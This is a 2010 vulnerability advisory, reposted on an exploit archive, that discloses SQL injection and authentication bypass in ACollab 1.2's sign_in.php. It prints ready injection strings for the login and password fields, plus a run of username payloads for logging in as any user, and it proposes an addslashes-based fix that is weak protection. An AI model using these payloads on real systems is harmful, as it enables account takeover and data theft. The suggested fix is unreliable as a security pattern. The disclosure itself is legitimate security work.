Home / os / win7

ACollab Multiple Vulnerabilities

Posted on 14 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ACollab Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================ ACollab Multiple Vulnerabilities ================================ ##########################www.BugReport.ir######################################## # # AmnPardaz Security Research Team # # Title: ACollab Multiple Vulnerabilities # Vendor: http://www.atutor.ca/acollab # Vulnerable Version: 1.2 (Latest version till now) # Exploitation: Remote with browser # Fix: N/A ################################################################################### #################### - Description: #################### ACollab as described by its vendor is an accessible, open source, multi-group, Web-based collaborative work environment. ACollab is available as a standalone collaborative work environment that will run on its own. ACollab is ideal for groups working at a distance developing documentation, collaborating on research, or writing joint papers. #################### - Vulnerability: #################### +--&gt; SQL Injection All of the parameters are sanitized correctly before being used in SQL queries else of the POST parameters 'login' and 'password' in the &quot;sign_in.php&quot; page. These parameters can be used for injecting arbitrary SQL queries; the 'login' parameter is single quoted and the 'password' parameter is single parenthesized, single quoted. +--&gt; Authentication Bypass The ACollab CMS uses two mechanism for authentication. One for master admin user which is based on a hard coded username/password initialized in the installation process. And a DB-based authentication for all other users, including the group administrators which can add/remove/edit all posts and news and ... from forums and first screen of the website. The second authentication mechanism can be bypassed. #################### - Exploits/PoCs: #################### +--&gt; Exploiting The (MySQL) SQL Injection Vulnerability: Go to the sign in page at &quot;victim.net/ACollab/sign_in.php&quot; and use the following vectors for injecting your desired SQL query, namely $Q: - In the Username field (login POST parameter): ' or $Q or ''=' - In the Password field (password POST parameter): ') or $Q or (''=' +--&gt; Exploiting The Authentication Bypass Vulnerability: You can login as anyone of the registered users of ACollab CMS by providing following vector as username and nothing as password: 'or''='' limit 1 offset 0 -- ' Above vector will log you as the first user according to its member id order. You can login as other users, searching for a group administrator account, by following vectors: 'or''='' limit 1 offset 0 -- ' 'or''='' limit 1 offset 1 -- ' 'or''='' limit 1 offset 2 -- ' .... #################### - Solution: #################### Add the following command $_POST['login'] = addslashes ($_POST['login']); $_POST['password'] = addslashes ($_POST['password']); at the line 46 of 'sign_in.php' file. #################### - Original Advisory: #################### http://www.bugreport.ir/index_72.htm #################### - Credit: #################### AmnPardaz Security Research &amp; Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP